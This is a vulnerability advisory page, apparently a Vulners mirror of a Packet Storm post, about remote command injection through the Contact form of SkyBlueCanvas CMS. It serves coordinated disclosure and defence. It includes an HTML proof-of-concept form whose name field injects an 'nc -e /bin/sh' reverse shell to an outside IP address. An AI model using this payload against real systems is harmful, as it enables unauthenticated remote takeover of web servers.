Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SkyBlueCanvas CMS 1.1 r248-03 Command Injection

🗓️ 25 Jan 2014 00:00:00Reported by Scott ParishType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

Vulnerability in SkyBlueCanvas CMS 1.1 r248-0

Code
`Vulnerability in SkyBlueCanvas CMS  
  
Vulnerability Type:  
Remote Command Injection  
  
Version Affected:  
1.1 r248-03 (and probably prior versions)  
  
Discovered by:  
Scott Parish - Center for Internet Security  
  
Vendor Information:  
SkyBlueCanvas is an easy-to-use Web Content Management System, that makes it simple to keep the content of your site fresh. You simply upload the software to your web server, and you are ready to start adding text and pictures to your web site.  
  
Vulnerability Details:  
The SkyBlueCanvas Lightweight CMS application contains a remote command injection vulnerability within the form on the Contact page. A remote un-authenticated user can exploit this vulnerability to force the webserver to execute commands in the context of the vulnerable application. It is possible to exploit this vulnerability because the POST parameters "name", "email", "subject", and "message" are not properly sanitized when submitted to the index.php?pid=4 page. Arbitrary commands can be executed by injecting the following payload to a vulnerable parameter:  
A"; <command>  
Since the page does not display the results of the injected command (blind injection) then testing must be done using a ping, nc, or similar command.  
  
Proof of Concept Exploit Code:  
<html>  
<body>  
<form action="http://localhost/index.php?pid=4" method="post">  
<input type="hidden" name="cid" value="3">  
<input type="hidden" name="name" value="test"; nc -e /bin/sh 192.168.1.2 12345">  
<input type="hidden" name="email" value="test">  
<input type="hidden" name="subject" value="test">  
<input type="hidden" name="message" value="test">  
<input type="hidden" name="action" value="Send">  
<input type="submit" value="submit">  
</form>  
</body>  
</html>  
  
References:  
http://skybluecanvas.com/  
  
Remediation:  
The vendor has issued a fix to the vulnerability in version 1.1 r248-04  
  
Revision History:  
1/9/14 - Vulnerability discovered  
1/10/14 - Vulnerability disclosed privately to vendor  
1/22/14 - Patch released by vendor  
1/23/14 - Vulnerability disclosed publicly  
This message and attachments may contain confidential information. If it appears that this message was sent to you by mistake, any retention, dissemination, distribution or copying of this message and attachments is strictly prohibited. Please notify the sender immediately and permanently delete the message and any attachments.  
  
. . .  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Jan 2014 00:00Current
7.4High risk
Vulners AI Score7.4
skybluecanvas cmscommand injectionremote exploitvulnerabilityvendor informationremote command injectionpatch releasedremote un-authenticated user
20